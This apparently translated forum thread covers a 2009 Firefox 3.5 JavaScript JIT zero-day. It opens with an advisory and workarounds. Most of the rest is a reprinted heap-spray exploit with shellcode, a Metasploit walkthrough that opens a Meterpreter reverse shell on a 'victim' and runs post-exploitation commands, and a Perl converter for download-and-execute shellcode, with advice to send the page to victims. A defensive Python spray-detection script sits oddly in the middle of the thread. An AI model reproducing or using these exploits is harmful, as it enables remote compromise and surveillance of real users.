0-day in Mozilla Firefox 3.5 - critical

http://www.us-cert.gov/current/index.html#mozilla_firefox_3_5_vulnerability

The JavaScript engine of Firefox 3.5 can currently be exploited to execute malicious code when a user opens a web page with embedded exploit code. The exploit code has already been widely distributed on the internet.

Current solution: disable JavaScript, or follow the US-CERT guidance at http://www.us-cert.gov/reading_room/securing_browser/#Mozilla_Firefox.

Addendum: there are two temporary workarounds:
- use the NoScript add-on for Firefox, or
- disable the JavaScript JIT: in about:config, set javascript.options.jit.content = false

Firefox 3.5.1 will be out this month to patch the JavaScript bug; see also http://blog.internetnews.com/skerner/2009/07/firefox-35-at-risk-from-0day-j.html on FF 3.5.

--- Edited to add the temporary-workaround section

Code:
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-13]
Guys, update Metasploit to exploit it. Video of the exploit: http://www.youtube.com/watch?v=G_lNIByYXxE
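The spray pattern in the PoC above (a tiny padding block doubled up to a large size and copied into an array, followed by %u-encoded bytes) is what a defender looks for in a captured page. The following scanner is an added example, not code from the original post or from milw0rm: it decodes %u strings into the bytes unescape() lays out in memory, flags the spray shape and pulls printable strings from the payload; the HTML fragment it scans is constructed to mirror the PoC's structure with a toy payload, and the thresholds are assumptions.

```python
import re

# Constructed sample page fragment modelled on the PoC's structure (padding block,
# doubling loop, spray array); the %u payload is a toy string, not the PoC's shellcode.
SAMPLE_HTML = r'''<script>
var shellcode = unescape("%u9090%u9090%u6163%u636C%u652E" +
                         "%u6578%u9000");
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000) { fullblock += fullblock; }
sprayContainer = new Array();
for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; }
</script>'''

UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:%u[0-9A-Fa-f]{4})+)"')
DOUBLING_RE = re.compile(r'while\s*\(\s*\w+\.length\s*<\s*(0x[0-9A-Fa-f]+|\d+)\s*\)')
SPRAY_LOOP_RE = re.compile(r'for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(\d+)\s*;')

def decode_u(s):
    """Bytes a %uXXXX string occupies in memory: UTF-16 little-endian, so %u6163 -> b'ca'."""
    units = re.findall(r'%u([0-9A-Fa-f]{4})', s)
    return b''.join(int(u, 16).to_bytes(2, 'little') for u in units)

def is_padding(blob):
    """A spray block is a single 4-byte value repeated (0x0c0c0c0c in the PoC)."""
    return len(blob) >= 4 and len(blob) % 4 == 0 and blob == blob[:4] * (len(blob) // 4)

def printable_strings(data, minlen=4):
    return [m.decode('ascii') for m in re.findall(rb'[ -~]{%d,}' % minlen, data)]

def analyse(html):
    """Heap-spray indicators: padding dword, doubling target, spray length, payload strings."""
    html = re.sub(r'"\s*\+\s*"', '', html)          # join "..." + "..." string literals
    blobs = [decode_u(m) for m in UNESCAPE_RE.findall(html)]
    padding = [b for b in blobs if is_padding(b)]
    payload = [b for b in blobs if not is_padding(b)]
    doubling = DOUBLING_RE.search(html)
    spray = SPRAY_LOOP_RE.search(html)
    report = {
        'blob_count': len(blobs),
        'padding_dword': padding[0][:4].hex() if padding else None,
        'doubling_target': int(doubling.group(1), 0) if doubling else 0,
        'spray_count': int(spray.group(1)) if spray else 0,
        'payload_strings': [s for b in payload for s in printable_strings(b)],
    }
    # Verdict (assumed thresholds): a padding block grown past 64 KiB and copied many times.
    report['heap_spray'] = bool(padding) and report['doubling_target'] >= 0x10000 and report['spray_count'] >= 50
    return report
```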
http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/multi/browser/firefox_escape_retval.rb

Guide to adding it: http://carnal0wnage.blogspot.com/2008/07/adding-your-own-exploits-in-metasploit.html or here: /hvaonline/posts/list/21868.html

msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(firefox_escape_retval) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Firefox 3.5.0 on Windows XP SP0-SP3

SRVPORT is currently 8080; change it to 80 for convenience, and set the URI path as well:

msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH index.html
URIPATH => index.html

Remember to set the IP address for the reverse connection:

msf exploit(firefox_escape_retval) > set LHOST 203.162.11.12
LHOST => 203.162.11.12

At this point the server will listen on port 4444; change it if needed. Start running the exploit:

msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using url: http://0.0.0.0:80/index.html
[*] Local IP: http://203.162.11.12:80/index.html
[*] Server started.

Once the victim has opened the address we have a shell; next, interact with the session to get the shell:

msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ipconfig

.................. What you do after that is up to you; however, if Firefox crashes or the victim closes it, the shell is lost, so once you have a shell, do whatever you need to do quickly :D

Code:
meterpreter > help
…….
Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data
    sniffer_interfaces  list all remote sniffable interfaces
    sniffer_start       Capture packets on a previously opened interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet captures on the specified interface
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter >
or to find out some more about the victim:
Code:
meterpreter > sysinfo
Computer: victim
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter >
Good luck, guys :D

Code:
0038695C            83E1 F8                    AND ECX,FFFFFFF8
0038695F            8B11                       MOV EDX,DWORD PTR DS:[ECX]
00386961            8B02                       MOV EAX,DWORD PTR DS:[EDX]  ; <-- EAX is modified here
00386963            83C3 FC                    ADD EBX,-4
00386966            53                         PUSH EBX
00386967            6A 00                      PUSH 0
00386969            51                         PUSH ECX
0038696A            8B48 20                    MOV ECX,DWORD PTR DS:[EAX+20] ; <-- heap spraying is used to place the padding & shellcode in the memory at eax + 20.
0038696D            57                         PUSH EDI
0038696E            FFD1                       CALL ECX         ; <-- the shellcode is called from here

mfeng wrote:
Some further technical analysis of this bug: the bug is in the file js3250.dll. The exploit code allows the values of eax and ecx to be controlled at the following instruction sequence:
Code:
0038695C            83E1 F8                    AND ECX,FFFFFFF8
0038695F            8B11                       MOV EDX,DWORD PTR DS:[ECX]
00386961            8B02                       MOV EAX,DWORD PTR DS:[EDX]  ; <-- EAX is modified here
00386963            83C3 FC                    ADD EBX,-4
00386966            53                         PUSH EBX
00386967            6A 00                      PUSH 0
00386969            51                         PUSH ECX
0038696A            8B48 20                    MOV ECX,DWORD PTR DS:[EAX+20] ; <-- heap spraying is used to place the padding & shellcode in the memory at eax + 20.
0038696D            57                         PUSH EDI
0038696E            FFD1                       CALL ECX         ; <-- the shellcode is called from here
 
It calls ECX directly, so no wonder when I read the shellcode of that PoC on milw0rm I saw it doesn't bother encoding the shellcode at all, NULL bytes all over the place. Thanks mfeng.

Impact key:

* Critical: Vulnerability can be used to run attacker code and install software, requiring no user interaction beyond normal browsing.
* High: Vulnerability can be used to gather sensitive data from sites in other windows or inject data or code into those sites, requiring no more than normal browsing actions.
* Moderate: Vulnerabilities that would otherwise be High or Critical except they only work in uncommon non-default configurations or require the user to perform complicated and/or unlikely steps.
* Low: Minor security vulnerabilities such as Denial of Service attacks, minor data leaks, or spoofs. (Undetectable spoofs of SSL indicia would have "High" impact because those are generally used to steal sensitive data intended for other sites.)

Fixed in Firefox 3.5.1

MFSA 2009-41 Corrupt JIT state after deep return from native function
http://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.1

# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode

Code:
#!/usr/bin/perl

use strict;

# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode

# coded by elazer (elazarb [at] earthlink.net)


# Usage (Linux):   perl jscript.pl
# Usage (Windows): jscript.pl
# No arguments: the script prints the shellcode below as a JScript %uXXXX
# string (little-endian code units) ready to paste into unescape("...").

# your shellcode here
my $shellcode =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdf".
"\xfa\xe2\x72\x83\xeb\xfc\xe2\xf4\x23\x90\x09\x3f\x37\x03\x1d\x8d".
"\x20\x9a\x69\x1e\xfb\xde\x69\x37\xe3\x71\x9e\x77\xa7\xfb\x0d\xf9".
"\x90\xe2\x69\x2d\xff\xfb\x09\x3b\x54\xce\x69\x73\x31\xcb\x22\xeb".
"\x73\x7e\x22\x06\xd8\x3b\x28\x7f\xde\x38\x09\x86\xe4\xae\xc6\x5a".
"\xaa\x1f\x69\x2d\xfb\xfb\x09\x14\x54\xf6\xa9\xf9\x80\xe6\xe3\x99".
"\xdc\xd6\x69\xfb\xb3\xde\xfe\x13\x1c\xcb\x39\x16\x54\xb9\xd2\xf9".
"\x9f\xf6\x69\x02\xc3\x57\x69\x32\xd7\xa4\x8a\xfc\x91\xf4\x0e\x22".
"\x20\x2c\x84\x21\xb9\x92\xd1\x40\xb7\x8d\x91\x40\x80\xae\x1d\xa2".
"\xb7\x31\x0f\x8e\xe4\xaa\x1d\xa4\x80\x73\x07\x14\x5e\x17\xea\x70".
"\x8a\x90\xe0\x8d\x0f\x92\x3b\x7b\x2a\x57\xb5\x8d\x09\xa9\xb1\x21".
"\x8c\xb9\xb1\x31\x8c\x05\x32\x1a\x1f\x52\xe0\x17\xb9\x92\xea\x3b".
"\xb9\xa9\x6b\x93\x4a\x92\x0e\x8b\x75\x9a\xb5\x8d\x09\x90\xf2\x23".
"\x8a\x05\x32\x14\xb5\x9e\x84\x1a\xbc\x97\x88\x22\x86\xd3\x2e\xfb".
"\x38\x90\xa6\xfb\x3d\xcb\x22\x81\x75\x6f\x6b\x8f\x21\xb8\xcf\x8c".
"\x9d\xd6\x6f\x08\xe7\x51\x49\xd9\xb7\x88\x1c\xc1\xc9\x05\x97\x5a".
"\x20\x2c\xb9\x25\x8d\xab\xb3\x23\xb5\xfb\xb3\x23\x8a\xab\x1d\xa2".
"\xb7\x57\x3b\x77\x11\xa9\x1d\xa4\xb5\x05\x1d\x45\x20\x2a\x8a\x95".
"\xa6\x3c\x9b\x8d\xaa\xfe\x1d\xa4\x20\x8d\x1e\x8d\x0f\x92\x12\xf8".
"\xdb\xa5\xb1\x8d\x09\x05\x32\x72";





# Convert the raw bytes to a JScript %uXXXX string and print it.
my $jscript = convert_shellcode($shellcode);
buffer_gen($shellcode);    # placeholder hook, does nothing (see below)
print $jscript, "\n";

# Random lowercase name of $wdsize+1 characters (unused here; handy for
# naming the variables in the generated page).
sub generate_char
{
 my $wdsize = shift;
 my @alphanumeric = ('a'..'z');
 my $wd = join '',
 map $alphanumeric[rand @alphanumeric], 0..$wdsize;
  return $wd;
}

# Pack two bytes per %uXXXX code unit. A JScript string is UTF-16, so the
# code unit 0xAABB is stored in memory as the bytes BB AA; 'LE' mode emits
# the second byte first so the bytes land in their original order.
sub convert_shellcode {
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        my $idx = 0;

        # Odd length: repeat the last byte so the final code unit is complete.
        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx < length($data) - 1) {
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}

# Placeholder in the original script; intentionally a no-op.
sub buffer_gen {
}
Then change the shellcode, upload the .html file to a host, and send it to the victim.

tientan.infotech wrote:
Mine is already updated to 3.5.2, but I've never tried hacking it. Could some bro teach me?
demo: http://www.youtube.com/watch?v=G_lNIByYXxE